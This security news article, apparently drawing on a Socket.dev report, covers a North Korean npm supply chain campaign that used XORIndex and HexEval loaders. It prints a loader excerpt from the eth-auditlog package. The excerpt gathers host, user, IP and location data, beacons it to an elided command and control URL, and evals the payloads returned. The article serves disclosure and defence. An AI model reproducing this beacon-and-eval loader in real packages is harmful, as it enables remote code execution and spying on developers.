North Korean threat actors have escalated their software supply chain attacks with the deployment of 67 malicious npm packages that collectively garnered over 17,000 downloads before detection.
This latest campaign represents a significant expansion of the ongoing “Contagious Interview” operation, introducing a previously unreported malware loader dubbed XORIndex alongside the existing HexEval Loader infrastructure.
The newly discovered XORIndex malware, named for its distinctive use of XOR-encoded strings and index-based obfuscation techniques, shows the threat actors’ continued evolution in developing sophisticated evasion mechanisms.
The malicious packages infiltrated the npm ecosystem through 18 different accounts registered with 15 distinct email addresses, with 27 packages remaining live on the registry at the time of discovery.
Socket.dev analysts identified this campaign as part of a broader North Korean cyber espionage effort targeting developers, cryptocurrency holders, and individuals with access to sensitive credentials.
The XORIndex Loader operates as a multi-stage attack framework, initially gathering host metadata before decoding and executing the BeaverTail second-stage malware, which subsequently references the InvisibleFerret backdoor for persistent access.
Timeline of HexEval and XORIndex Loader campaigns (Source – Socket.dev)
The campaign’s infrastructure relies on hardcoded command and control endpoints hosted on legitimate platforms such as Vercel (the specific URLs are omitted here).
This approach allows the threat actors to maintain operational security while leveraging trusted hosting services to evade detection mechanisms.
The XORIndex Loader has amassed over 9,000 downloads between June and July 2025, operating in parallel with the continuing HexEval campaign, which has generated a further 8,000 downloads across newly discovered packages.
This dual-track approach demonstrates the threat actors’ commitment to maintaining multiple attack vectors simultaneously.
XORIndex Infection Mechanism and Code Execution
The XORIndex Loader’s infection mechanism begins immediately upon package installation, leveraging Node.js post-install hooks to execute malicious code without user interaction.
The malware employs a sophisticated reconnaissance phase, gathering comprehensive system information including hostname, username, external IP address, geolocation data, and platform details before establishing communication with command and control servers.
A representative code snippet from the eth-auditlog package demonstrates the loader’s core functionality:
// Loader excerpt as reported. The two URL arguments are elided in the source and
// are shown here as labelled placeholder constants so the snippet parses.
const os = require('os');
const axios = require('axios');
const publicIp = require('public-ip');
const GEO_LOOKUP_URL = '<geolocation API URL elided in source>';
const BEACON_URL = '<command and control URL elided in source>';

// Collects local telemetry (host/user/IP/geo/platform)
async function gatherInfo() {
  const ip = await publicIp.v4();
  // Response body assumed to be the geolocation record for the public IP
  const geo = (await axios.get(`${GEO_LOOKUP_URL}/${ip}`)).data;
  return {
    host: os.hostname(),
    user: os.userInfo().username,
    ip,
    location: geo,
    platform: os.platform()
  };
}

// Sends beacon and executes threat actor-supplied JavaScript payloads
module.exports = async function author() {
  const info = await gatherInfo();
  const version = process.env.npm_package_version;
  axios.post(BEACON_URL, { ...info, version })
    .then(res => {
      eval(res.data.s1); // Execute primary payload
      eval(res.data.s2); // Execute optional secondary payload
    });
};
The loader’s evolution from basic prototypes to sophisticated malware shows deliberate progression in obfuscation techniques, advancing from simple remote code execution capabilities to comprehensive system profiling and multi-endpoint command rotation, positioning it as a formidable threat to software supply chain security.